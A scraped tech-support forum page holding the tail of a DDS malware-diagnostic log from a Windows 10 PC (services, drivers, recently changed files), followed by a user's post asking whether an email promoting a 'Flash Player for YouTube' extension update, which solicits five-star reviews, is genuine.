R2 Intel(R) Capability Licensing Service Interface;Intel(R) Capability Licensing Service Interface;C:\Program Files\Intel\iCLS Client\HeciServer.exe [2013-5-11 733696]
R2 jhi_service;Intel(R) Dynamic Application Loader Host Interface Service;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [2014-11-19 169432]
R2 LavasoftAdAwareService11;Ad-Aware Service 11;C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.14.1023.10544\AdAwareService.exe [2016-12-5 630976]
R2 OneSyncSvc_206b8d;Sync Host_206b8d;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R2 RichVideo64;Cyberlink RichVideo64 Service(CRVS);C:\Program Files\CyberLink\Shared files\RichVideo64.exe [2014-11-19 390632]
R2 SDScannerService;Spybot-S&D 2 Scanner Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [2016-11-2 1738168]
R2 SDUpdateService;Spybot-S&D 2 Updating Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2016-11-2 4088608]
R2 SDWSCService;Spybot-S&D 2 Security Center Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [2016-11-2 235984]
R2 storqosflt;Storage QoS Filter Driver;C:\WINDOWS\System32\drivers\storqosflt.sys [2016-7-16 78336]
R2 tiledatamodelsvc;Tile Data model server;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
R2 UserManager;User Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R2 vToolbarUpdater40.3.6;vToolbarUpdater40.3.6;C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\40.3.6\ToolbarUpdater.exe [2016-11-14 1349704]
R2 wcifs;Windows Container Isolation;C:\WINDOWS\System32\drivers\wcifs.sys [2016-9-29 119648]
R2 wcnfs;Windows Container Name Virtualization;C:\WINDOWS\System32\drivers\wcnfs.sys [2016-7-16 66560]
R2 WpnService;Windows Push Notifications System Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R2 WtuSystemSupport;WtuSystemSupport;C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe [2016-11-14 980552]
R3 AppXSvc;AppX Deployment Service (AppXSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2016-7-16 44496]
R3 bcbtums;Bluetooth RAM Firmware Download USB Filter;C:\WINDOWS\System32\drivers\bcbtums.sys [2015-3-27 173312]
R3 BthLEEnum;Bluetooth Low Energy Driver;C:\WINDOWS\System32\drivers\BthLEEnum.sys [2016-9-29 249856]
R3 DptfDevDram;DptfDevDram;C:\WINDOWS\System32\drivers\DptfDevDram.sys [2013-12-2 145640]
R3 DptfDevPch;DptfDevPch;C:\WINDOWS\System32\drivers\DptfDevPch.sys [2013-12-2 116752]
R3 DptfDevProc;DptfDevProc;C:\WINDOWS\System32\drivers\DptfDevProc.sys [2013-12-2 290256]
R3 DptfManager;DptfManager;C:\WINDOWS\System32\drivers\DptfManager.sys [2013-12-2 494808]
R3 DsSvc;Data Sharing Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
R3 enecir;ENE CIR Receiver;C:\WINDOWS\System32\drivers\enecir.sys [2013-12-2 71168]
R3 iwdbus;IWD Bus Enumerator;C:\WINDOWS\System32\drivers\iwdbus.sys [2013-9-30 27032]
R3 lfsvc;Geolocation Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R3 LicenseManager;Windows License Manager Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
R3 NcbService;Network Connection Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [2016-7-16 20480]
R3 PimIndexMaintenanceSvc_206b8d;Contact Data_206b8d;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R3 RTL8168;Realtek 8168 NT Driver;C:\WINDOWS\System32\drivers\Rt630x64.sys [2013-12-5 830680]
R3 StateRepository;State Repository Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
R3 TimeBrokerSvc;Time Broker;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
R3 UEFI;Microsoft UEFI Driver;C:\WINDOWS\System32\drivers\uefi.sys [2016-7-16 28512]
R3 UnistoreSvc_206b8d;User Data Storage_206b8d;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R3 UserDataSvc_206b8d;User Data Access_206b8d;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S0 Avgboota;AVG Early Launch Anti-Malware Driver;C:\WINDOWS\System32\drivers\avgboota.sys [2016-1-7 21632]
S2 DoSvc;Delivery Optimization;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S2 MapsBroker;Downloaded Maps Manager;C:\WINDOWS\System32\svchost.exe -k NetworkService [2016-7-16 44496]
S3 AcpiDev;ACPI Devices driver;C:\WINDOWS\System32\drivers\AcpiDev.sys [2016-7-16 18432]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2016-7-16 1135456]
S3 AJRouter;AllJoyn Router Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 applockerfltr;Smartlocker Filter Driver;C:\WINDOWS\System32\drivers\applockerfltr.sys [2016-7-16 15360]
S3 AppReadiness;App Readiness;C:\WINDOWS\System32\svchost.exe -k AppReadiness [2016-7-16 44496]
S3 AvgAMPS;AvgAMPS;C:\Program Files (x86)\AVG\Av\avgamps.exe [2016-11-2 647864]
S3 bcmfn;bcmfn Service;C:\WINDOWS\System32\drivers\bcmfn.sys [2016-7-16 9728]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2016-7-16 9728]
S3 BthHFSrv;Bluetooth Handsfree Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceAndNoImpersonation [2016-7-16 44496]
S3 btwampfl;btwampfl;C:\WINDOWS\System32\drivers\btwampfl.sys [2015-3-27 188160]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2016-7-16 38912]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2016-10-27 118272]
S3 cht4iscsi;cht4iscsi;C:\WINDOWS\System32\drivers\cht4sx64.sys [2016-7-16 346976]
S3 cht4vbd;Chelsio Virtual Bus Driver;C:\WINDOWS\System32\drivers\cht4vx64.sys [2016-7-16 2104160]
S3 ClipSVC;Client License Service (ClipSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2016-7-16 44496]
S3 DcpSvc;DataCollectionPublishingService;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 DevQueryBroker;DevQuery Background Discovery Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;C:\WINDOWS\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2016-7-16 93184]
S3 DmEnrollmentSvc;Device Management Enrollment Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 dmwappushservice;dmwappushsvc;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 DptfDevDisplay;DptfDevDisplay;C:\WINDOWS\System32\drivers\DptfDevDisplay.sys [2013-12-2 70752]
S3 DptfDevFan;DptfDevFan;C:\WINDOWS\System32\drivers\DptfDevFan.sys [2013-12-2 50640]
S3 DptfDevGen;DptfDevGen;C:\WINDOWS\System32\drivers\DptfDevGen.sys [2013-12-2 78504]
S3 DptfDevPower;DptfDevPower;C:\WINDOWS\System32\drivers\DptfDevPower.sys [2013-12-2 71808]
S3 embeddedmode;Embedded Mode;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 EntAppSvc;Enterprise App Management Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
S3 FirebirdServerMAGIXInstance;Firebird Server - MAGIX Instance;C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\fbserver.exe [2011-4-26 2702848]
S3 FrameServer;Windows Camera Frame Server;C:\WINDOWS\System32\svchost.exe -k Camera [2016-7-16 44496]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2016-7-16 20480]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2016-7-16 50016]
S3 hitmanpro37;HitmanPro 3.7 Support Driver;C:\WINDOWS\System32\drivers\hitmanpro37.sys [2016-11-7 54736]
S3 HvHost;HV Host Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 iagpio;Intel Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iagpio.sys [2016-7-16 33280]
S3 iai2c;Intel(R) Serial IO I2C Host Controller;C:\WINDOWS\System32\drivers\iai2c.sys [2016-7-16 81408]
S3 iaLPSS2i_GPIO2;Intel(R) Serial IO GPIO Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys [2016-7-16 64512]
S3 iaLPSS2i_I2C;Intel(R) Serial IO I2C Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys [2016-7-16 176384]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2016-7-16 38128]
S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2016-7-16 113152]
S3 iaStorAV;Intel(R) SATA RAID Controller Windows;C:\WINDOWS\System32\drivers\iaStorAV.sys [2016-7-16 673120]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2016-7-16 526176]
S3 icssvc;Windows Mobile Hotspot Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 IndirectKmd;Indirect Displays Kernel-Mode Driver;C:\WINDOWS\System32\drivers\IndirectKmd.sys [2016-7-16 35840]
S3 intaud_WaveExtensible;Intel WiDi Audio Device;C:\WINDOWS\System32\drivers\intelaud.sys [2013-9-30 39320]
S3 IntcDAud;Intel(R) Display Audio;C:\WINDOWS\System32\drivers\IntcDAud.sys [2015-7-16 472872]
S3 Intel(R) Capability Licensing Service TCP IP Interface;Intel(R) Capability Licensing Service TCP IP Interface;C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [2013-5-11 822232]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2016-7-16 105824]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2016-7-16 101216]
S3 megasas2i;megasas2i;C:\WINDOWS\System32\drivers\MegaSas2i.sys [2016-10-11 64352]
S3 MessagingService_206b8d;MessagingService_206b8d;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2016-7-16 842584]
S3 ndfltr;NetworkDirect Service;C:\WINDOWS\System32\drivers\ndfltr.sys [2016-7-16 108896]
S3 NetAdapterCx;Network Adapter Wdf Class Extension Library;C:\WINDOWS\System32\drivers\NetAdapterCx.sys [2016-7-16 90624]
S3 NetSetupSvc;Network Setup Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 NgcCtnrSvc;Microsoft Passport Container;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 NgcSvc;Microsoft Passport;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 percsas2i;percsas2i;C:\WINDOWS\System32\drivers\percsas2i.sys [2016-7-16 58720]
S3 percsas3i;percsas3i;C:\WINDOWS\System32\drivers\percsas3i.sys [2016-7-16 61792]
S3 PhoneSvc;Phone Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S3 ReFSv1;ReFSv1;C:\WINDOWS\System32\drivers\refsv1.sys [2016-7-16 928608]
S3 RetailDemo;Retail Demo Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 ScDeviceEnum;Smart Card Device Enumeration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 scmbus;Microsoft Storage Class Memory Bus Driver;C:\WINDOWS\System32\drivers\scmbus.sys [2016-7-16 88416]
S3 scmdisk0101;Microsoft NVDIMM-N disk driver;C:\WINDOWS\System32\drivers\scmdisk0101.sys [2016-7-16 123904]
S3 SensorDataService;Sensor Data Service;C:\WINDOWS\System32\SensorDataService.exe [2016-9-25 1312768]
S3 SensorService;Sensor Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 SerCx2;Serial UART Support Library;C:\WINDOWS\System32\drivers\SerCx2.sys [2016-7-16 151904]
S3 smphost;Microsoft Storage Spaces SMP;C:\WINDOWS\System32\svchost.exe -k smphost [2016-7-16 44496]
S3 SmsRouter;Microsoft Windows SMS Router Service.;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 stornvme;Microsoft Standard NVM Express Driver;C:\WINDOWS\System32\drivers\stornvme.sys [2016-9-29 81760]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;C:\WINDOWS\System32\drivers\storufs.sys [2016-7-16 32096]
S3 TieringEngineService;Storage Tiers Management;C:\WINDOWS\System32\TieringEngineService.exe [2016-7-16 287744]
S3 UcmCx0101;USB Connector Manager KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmCx.sys [2016-7-16 95744]
S3 UcmTcpciCx0101;UCM-TCPCI KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmTcpciCx.sys [2016-7-16 108544]
S3 UcmUcsi;USB Connector Manager UCSI Client;C:\WINDOWS\System32\drivers\UcmUcsi.sys [2016-7-16 50688]
S3 UdeCx;USB Device Emulation Support Library;C:\WINDOWS\System32\drivers\Udecx.sys [2016-7-16 45568]
S3 Ufx01000;USB Function Class Extension;C:\WINDOWS\System32\drivers\ufx01000.sys [2016-7-16 263008]
S3 UfxChipidea;USB Chipidea Controller;C:\WINDOWS\System32\drivers\UfxChipidea.sys [2016-7-16 96608]
S3 ufxsynopsys;USB Synopsys Controller;C:\WINDOWS\System32\drivers\ufxsynopsys.sys [2016-7-16 137056]
S3 UrsChipidea;Chipidea USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urschipidea.sys [2016-7-16 28512]
S3 UrsCx01000;USB Role-Switch Support Library;C:\WINDOWS\System32\drivers\urscx01000.sys [2016-7-16 57696]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urssynopsys.sys [2016-7-16 27488]
S3 USBAAPL64;Apple Mobile USB Driver;C:\WINDOWS\System32\drivers\usbaapl64.sys [2015-6-17 54784]
S3 UsoSvc;Update Orchestrator Service for Windows Update;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 vhf;Virtual HID Framework (VHF) Driver;C:\WINDOWS\System32\drivers\vhf.sys [2016-7-16 32256]
S3 vmgid;Microsoft Hyper-V Guest Infrastructure Driver;C:\WINDOWS\System32\drivers\vmgid.sys [2016-7-16 10240]
S3 vmicguestinterface;Hyper-V Guest Service Interface;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 vmicvmsession;Hyper-V PowerShell Direct Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 WalletService;WalletService;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
S3 wdiwifi;WDI Driver Framework;C:\WINDOWS\System32\drivers\WdiWiFi.sys [2016-9-29 719360]
S3 WdNisDrv;Windows Defender Network Inspection System Driver;C:\WINDOWS\System32\drivers\WdNisDrv.sys [2016-7-16 123232]
S3 WdNisSvc;Windows Defender Network Inspection Service;C:\Program Files\Windows Defender\NisSrv.exe [2016-7-16 347328]
S3 WEPHOSTSVC;Windows Encryption Provider Host Service;C:\WINDOWS\System32\svchost.exe -k WepHostSvcGroup [2016-7-16 44496]
S3 WinMad;WinMad Service;C:\WINDOWS\System32\drivers\winmad.sys [2016-7-16 32096]
S3 WinVerbs;WinVerbs Service;C:\WINDOWS\System32\drivers\winverbs.sys [2016-7-16 64864]
S3 wisvc;Windows Insider Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 workfolderssvc;Work Folders;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S3 WpnUserService_206b8d;Windows Push Notifications User Service_206b8d;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 XblAuthManager;Xbox Live Auth Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 XblGameSave;Xbox Live Game Save;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 xboxgip;Xbox Game Input Protocol Driver;C:\WINDOWS\System32\drivers\xboxgip.sys [2016-12-9 258560]
S3 XboxNetApiSvc;Xbox Live Networking Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 xinputhid;XINPUT HID Filter Driver;C:\WINDOWS\System32\drivers\xinputhid.sys [2016-9-25 43520]
S4 shpamsvc;Shared PC Account Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S4 tzautoupdate;Auto Time Zone Updater;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
.
=============== Created Last 30 ================
.
2016-12-19 00:48:33 -------- d-----w- C:\Users\Nicholas\AppData\Roaming\Smartflix
2016-12-19 00:48:27 -------- d-----w- C:\Users\Nicholas\AppData\Local\smartflix
2016-12-19 00:48:26 -------- d-----w- C:\Users\Nicholas\AppData\Local\SquirrelTemp
2016-12-17 19:27:25 -------- d--h--w- C:\OneDriveTemp
2016-12-15 03:10:16 321480 ----a-w- C:\Program Files (x86)\Mozilla Firefox\tobedeleted\mozB629.tmp
2016-12-14 03:36:18 20364888 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerInstaller.exe
2016-12-09 22:58:59 691712 ----a-w- C:\WINDOWS\System32\lsm.dll
2016-12-08 08:16:03 -------- d-----w- C:\WINDOWS\pss
2016-12-08 08:14:25 -------- d-----w- C:\Program Files\Common Files\Lavasoft
.
==================== Find3M ====================
.
2016-12-14 17:08:15 180 ----a-w- C:\WINDOWS\System32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-12-11 23:56:25 835576 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
2016-12-11 23:56:25 177656 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
2016-12-09 22:43:22 180224 ----a-w- C:\WINDOWS\System32\enrollmentapi.dll
2016-12-09 10:42:15 1637728 ----a-w- C:\WINDOWS\System32\appraiser.dll
2016-12-09 10:42:14 137568 ----a-w- C:\WINDOWS\System32\acmigration.dll
2016-12-09 10:34:34 894096 ----a-w- C:\WINDOWS\System32\winresume.exe
2016-12-09 10:34:34 1051112 ----a-w- C:\WINDOWS\System32\winresume.efi
2016-12-09 10:33:26 1354320 ----a-w- C:\WINDOWS\System32\winload.efi
2016-12-09 10:33:26 1173496 ----a-w- C:\WINDOWS\System32\winload.exe
2016-12-09 10:32:11 7816032 ----a-w- C:\WINDOWS\System32\ntoskrnl.exe
2016-12-09 10:30:39 377184 ----a-w- C:\WINDOWS\System32\drivers\clfs.sys
2016-12-09 10:29:23 2681200 ----a-w- C:\WINDOWS\System32\CoreUIComponents.dll
2016-12-09 10:28:24 764392 ----a-w- C:\WINDOWS\System32\CoreMessaging.dll
2016-12-09 10:27:38 172528 ----a-w- C:\WINDOWS\System32\sspicli.dll
2016-12-09 10:20:21 2677544 ----a-w- C:\WINDOWS\System32\d3d10warp.dll
2016-12-09 10:20:20 2189664 ----a-w- C:\WINDOWS\System32\drivers\dxgkrnl.sys
2016-12-09 10:20:16 658784 ----a-w- C:\WINDOWS\System32\drivers\dxgmms2.sys
2016-12-09 10:20:13 402272 ----a-w- C:\WINDOWS\System32\drivers\dxgmms1.sys
2016-12-09 10:20:12 1738560 ----a-w- C:\WINDOWS\System32\WindowsCodecs.dll
2016-12-09 10:19:35 1293152 ----a-w- C:\WINDOWS\System32\LicenseManager.dll
2016-12-09 10:19:21 168424 ----a-w- C:\WINDOWS\System32\bcrypt.dll
2016-12-09 10:18:47 624048 ----a-w- C:\WINDOWS\System32\drivers\cng.sys
2016-12-09 10:18:21 2913144 ----a-w- C:\WINDOWS\System32\combase.dll
2016-12-09 10:18:16 1100128 ----a-w- C:\WINDOWS\System32\hvix64.exe
2016-12-09 10:18:15 1267512 ----a-w- C:\WINDOWS\System32\WinTypes.dll
2016-12-09 10:18:14 811872 ----a-w- C:\WINDOWS\System32\hvloader.exe
2016-12-09 10:18:12 947552 ----a-w- C:\WINDOWS\System32\hvloader.efi
2016-12-09 10:18:09 989024 ----a-w- C:\WINDOWS\System32\hvax64.exe
2016-12-09 10:15:26 8168000 ----a-w- C:\WINDOWS\System32\Windows.Media.Protection.PlayReady.dll
2016-12-09 10:15:18 1988560 ----a-w- C:\WINDOWS\System32\mfmp4srcsnk.dll
2016-12-09 10:14:50 1274712 ----a-w- C:\WINDOWS\System32\ole32.dll
2016-12-09 10:14:33 241504 ----a-w- C:\WINDOWS\System32\CloudExperienceHost.dll
2016-12-09 10:11:15 2048496 ----a-w- C:\WINDOWS\SysWow64\CoreUIComponents.dll
2016-12-09 10:10:58 1461200 ----a-w- C:\WINDOWS\System32\user32.dll
2016-12-09 10:10:40 1572768 ----a-w- C:\WINDOWS\System32\gdi32full.dll
2016-12-09 10:09:27 455520 ----a-w- C:\WINDOWS\System32\securekernel.exe
2016-12-09 10:01:59 2323728 ----a-w- C:\WINDOWS\SysWow64\d3d10warp.dll
2016-12-09 10:01:43 1503544 ----a-w- C:\WINDOWS\SysWow64\WindowsCodecs.dll
2016-12-09 10:01:08 861024 ----a-w- C:\WINDOWS\SysWow64\LicenseManager.dll
2016-12-09 10:00:58 106896 ----a-w- C:\WINDOWS\SysWow64\bcrypt.dll
2016-12-09 09:59:25 846560 ----a-w- C:\WINDOWS\SysWow64\WinTypes.dll
2016-12-09 09:59:24 2166752 ----a-w- C:\WINDOWS\SysWow64\combase.dll
2016-12-09 09:57:01 1852720 ----a-w- C:\WINDOWS\SysWow64\mfmp4srcsnk.dll
2016-12-09 09:57:00 6668040 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.Protection.PlayReady.dll
2016-12-09 09:56:15 959112 ----a-w- C:\WINDOWS\SysWow64\ole32.dll
2016-12-09 09:52:21 1435896 ----a-w- C:\WINDOWS\SysWow64\user32.dll
2016-12-09 09:52:21 1415752 ----a-w- C:\WINDOWS\SysWow64\gdi32full.dll
2016-12-09 09:51:08 117240 ----a-w- C:\WINDOWS\SysWow64\sspicli.dll
2016-12-09 09:47:29 22563328 ----a-w- C:\WINDOWS\System32\edgehtml.dll
2016-12-09 09:45:47 40448 ----a-w- C:\WINDOWS\System32\WordBreakers.dll
2016-12-09 09:45:43 206848 ----a-w- C:\WINDOWS\System32\win32k.sys
2016-12-09 09:42:29 227328 ----a-w- C:\WINDOWS\System32\cdd.dll
2016-12-09 09:41:22 380928 ----a-w- C:\WINDOWS\System32\wincorlib.dll
2016-12-09 09:41:06 32768 ----a-w- C:\WINDOWS\SysWow64\WordBreakers.dll
2016-12-09 09:40:38 147968 ----a-w- C:\WINDOWS\SysWow64\win32k.sys
2016-12-09 09:38:39 324608 ----a-w- C:\WINDOWS\System32\Windows.ApplicationModel.LockScreen.dll
2016-12-09 09:37:29 261632 ----a-w- C:\WINDOWS\System32\indexeddbserver.dll
2016-12-09 09:37:10 411136 ----a-w- C:\WINDOWS\System32\facecredentialprovider.dll
2016-12-09 09:37:01 49152 ----a-w- C:\WINDOWS\System32\Windows.UI.Shell.dll
2016-12-09 09:36:56 425984 ----a-w- C:\WINDOWS\System32\aadcloudap.dll
2016-12-09 09:36:32 410112 ----a-w- C:\WINDOWS\System32\AppXDeploymentClient.dll
2016-12-09 09:36:09 3059200 ----a-w- C:\WINDOWS\System32\msi.dll
2016-12-09 09:36:05 231936 ----a-w- C:\WINDOWS\SysWow64\Windows.ApplicationModel.LockScreen.dll
2016-12-09 09:36:02 6285312 ----a-w- C:\WINDOWS\System32\Windows.Media.dll
2016-12-09 09:34:52 822784 ----a-w- C:\WINDOWS\SysWow64\Chakradiag.dll
2016-12-09 09:34:31 288768 ----a-w- C:\WINDOWS\SysWow64\wincorlib.dll
2016-12-09 09:33:42 3777536 ----a-w- C:\WINDOWS\System32\MFMediaEngine.dll
2016-12-09 09:33:37 1589760 ----a-w- C:\WINDOWS\System32\msdtctm.dll
2016-12-09 09:32:18 635904 ----a-w- C:\WINDOWS\SysWow64\jscript9diag.dll
2016-12-09 09:31:22 3689984 ----a-w- C:\WINDOWS\SysWow64\msi.dll
2016-12-09 09:31:20 198656 ----a-w- C:\WINDOWS\SysWow64\indexeddbserver.dll
2016-12-09 09:31:11 313856 ----a-w- C:\WINDOWS\SysWow64\AppXDeploymentClient.dll
2016-12-09 09:30:32 19413504 ----a-w- C:\WINDOWS\SysWow64\edgehtml.dll
2016-12-09 09:30:31 4612608 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.dll
2016-12-09 09:29:51 4749312 ----a-w- C:\WINDOWS\System32\SettingsHandlers_nt.dll
2016-12-09 09:28:55 1004544 ----a-w- C:\WINDOWS\System32\enterprisecsps.dll
2016-12-09 09:28:12 3306496 ----a-w- C:\WINDOWS\SysWow64\MFMediaEngine.dll
2016-12-09 09:27:55 5114368 ----a-w- C:\WINDOWS\System32\cdp.dll
2016-12-09 09:27:36 981504 ----a-w- C:\WINDOWS\System32\Windows.Security.Authentication.OnlineId.dll
2016-12-09 09:26:32 8129536 ----a-w- C:\WINDOWS\System32\Chakra.dll
2016-12-09 09:26:01 1692672 ----a-w- C:\WINDOWS\System32\AppXDeploymentExtensions.onecore.dll
2016-12-09 09:25:28 376832 ----a-w- C:\WINDOWS\System32\CryptoWinRT.dll
2016-12-09 09:24:21 2275840 ----a-w- C:\WINDOWS\System32\AppXDeploymentServer.dll
2016-12-09 09:22:27 1490944 ----a-w- C:\WINDOWS\System32\lsasrv.dll
2016-12-09 09:22:06 2820096 ----a-w- C:\WINDOWS\System32\InputService.dll
2016-12-09 09:22:02 2688512 ----a-w- C:\WINDOWS\System32\Windows.UI.Logon.dll
2016-12-09 09:21:48 4746752 ----a-w- C:\WINDOWS\System32\jscript9.dll
2016-12-09 09:21:42 3616768 ----a-w- C:\WINDOWS\System32\win32kfull.sys
2016-12-09 09:21:31 1512960 ----a-w- C:\WINDOWS\System32\win32kbase.sys
2016-12-09 09:21:04 716800 ----a-w- C:\WINDOWS\System32\ShareHost.dll
2016-12-09 09:20:36 730624 ----a-w- C:\WINDOWS\System32\fveapi.dll
2016-12-09 09:20:35 3198464 ----a-w- C:\WINDOWS\SysWow64\cdp.dll
2016-12-09 09:20:33 6044160 ----a-w- C:\WINDOWS\SysWow64\Chakra.dll
2016-12-09 09:20:32 172544 ----a-w- C:\WINDOWS\System32\DeviceEnroller.exe
2016-12-09 09:20:05 187392 ----a-w- C:\WINDOWS\System32\mdmregistration.dll
2016-12-09 09:19:46 433664 ----a-w- C:\WINDOWS\System32\TextInputFramework.dll
2016-12-09 09:19:45 1121280 ----a-w- C:\WINDOWS\System32\aadtb.dll
2016-12-09 09:19:43 261120 ----a-w- C:\WINDOWS\System32\Windows.UI.Core.TextInput.dll
2016-12-09 09:19:32 85504 ----a-w- C:\WINDOWS\System32\EditBufferTestHook.dll
.
============= FINISH: 12:29:27.29 ===============

Attached Files

	attach.txt (3.6 KB)
	dds.txt (39.5 KB)

↧

Flash® Player for YouTube has been updated

December 22, 2016, 10:44 pm

≫ Next: Your TV Link

≪ Previous: Win32/Zperm virus & popups.

Hi,
I have received the below email and would like to know if it is genuine or someone trying get into my PC?
Regards Brobilly

Flash® Player for YouTube has been updated

Bookmark this page if you don't have time to read it now or if you want to retrieve the instructions it contains later!
What's new

This version brings improvements and is compatible with the upcoming Material Design version of YouTube.
Chrome has started blocking Flash® content!

If you use Chrome version 53 or later you have probably noticed that Flash® content has become click-to-play on a multitude of websites. Even if Google is making a temporary exception for popular websites like YouTube, it has planned to phase out the whitelist over time to finally make HTML5 the default experience! Take a few seconds to give five stars to Flash® Player for YouTube here to let Google know that there are people who still rely on Flash® Player to watch YouTube videos because their devices don't easily support the default HTML5 player. Here are a few samples of what you can write if you're not inspired:

Useful extension. My device consumes less CPU and RAM resources with Flash® Player than with the default HTML5 player.
Useful extension. My device doesn't easily support HTML5 videos.
Useful extension. I cannot watch HD videos without Flash® Player.
Useful extension. Flash® Player performs better than the default HTML5 player on my device.

